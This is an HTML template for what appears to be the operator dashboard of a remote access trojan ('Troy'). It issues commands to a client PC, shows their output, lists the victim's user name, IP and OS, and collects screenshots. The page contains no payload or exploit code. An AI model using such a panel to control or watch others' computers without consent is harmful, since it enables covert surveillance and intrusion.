<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org" lang="en">
<head>
    <meta charset="UTF-8"/>
    <title>Troy Dashboard</title>
    <link rel="stylesheet" href="../vorlage.css"/>
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"/>
    <script rel="script" src="../urlParam.js"></script>
</head>
<body>
<center>
    <div id="outer">
        <div id="inner">
            <h1 th:text="'Control Panel for ' + ${model.client.pcName}"></h1>
            <hr/>
            <h3>Client Commands</h3>
            <pre th:text="${model.client.commands} + ' '" class="log"></pre>

            <br/>
            <form th:action="'/command/edit/' + ${model.client.pcName}" th:method="post" method="post">
                <label for="commandsField">Command:</label>
                <input style="width: 400px;" id="commandsField" spellcheck="false" name="commands"
                       th:value="${model.client.commands}" class="input log w3-card-4" autocomplete="off"
                       placeholder="Command"/>
                <input type="submit" class="input w3-card-4" value="Speichern" id="primaryAction"/>
            </form>
            <hr/>
            <br/>
            <h3>Commands output</h3>
            <form th:action="'/dashboard/' + ${model.client.pcName}" th:method="post" method="post">
                <input type="submit" value="Clear" class="input secondaryAction w3-card-4"/>
                <a th:href="'/dashboard/' + ${model.client.pcName}" class="input secondaryAction w3-card-4">Reload</a>
            </form>
            <!--/*@thymesVar id="log" type="ch.lebois.troyserver.controller.DashboardController"*/-->
            <pre class="log logb" id="log" th:text="${logs}"></pre>
            <br/>
            <h3>Client Info</h3>
            <pre style="text-align: left">
<span th:text="'Pc Name: ' + ${model.client.pcName}"></span>
<span th:text="'User: ' + ${model.client.pcuser}"></span>
<span th:text="'Last seen: ' + ${model.client.lastseen}"></span>
<span th:text="'OS: ' + ${model.client.os}"></span>
<span th:text="'Ip: ' + ${model.client.ip}"></span>
<span th:text="'Arch: ' + ${model.client.arch}"></span>
            </pre>
            <br/>
            <h3>Screenshots</h3>
            <ul class="w3-ul w3-card-4 w3-hoverable">
                <li th:each="img:${images}" class="w3-display-container">
                    <a th:href="'/dashboard/img/' + ${img.name}" th:text="${img.name}"></a>
                    <a th:href="'/dashboard/img/' + ${img.name} + '/remove?client=' + ${model.client.pcName}"
                       class="w3-button w3-display-right w3-hover-red">&times;</a>
                </li>
            </ul>
            <br/>
            <a href="../dashboard" class="input secondaryAction w3-card-4">Back</a>
        </div>
    </div>
</center>
</body>
</html>
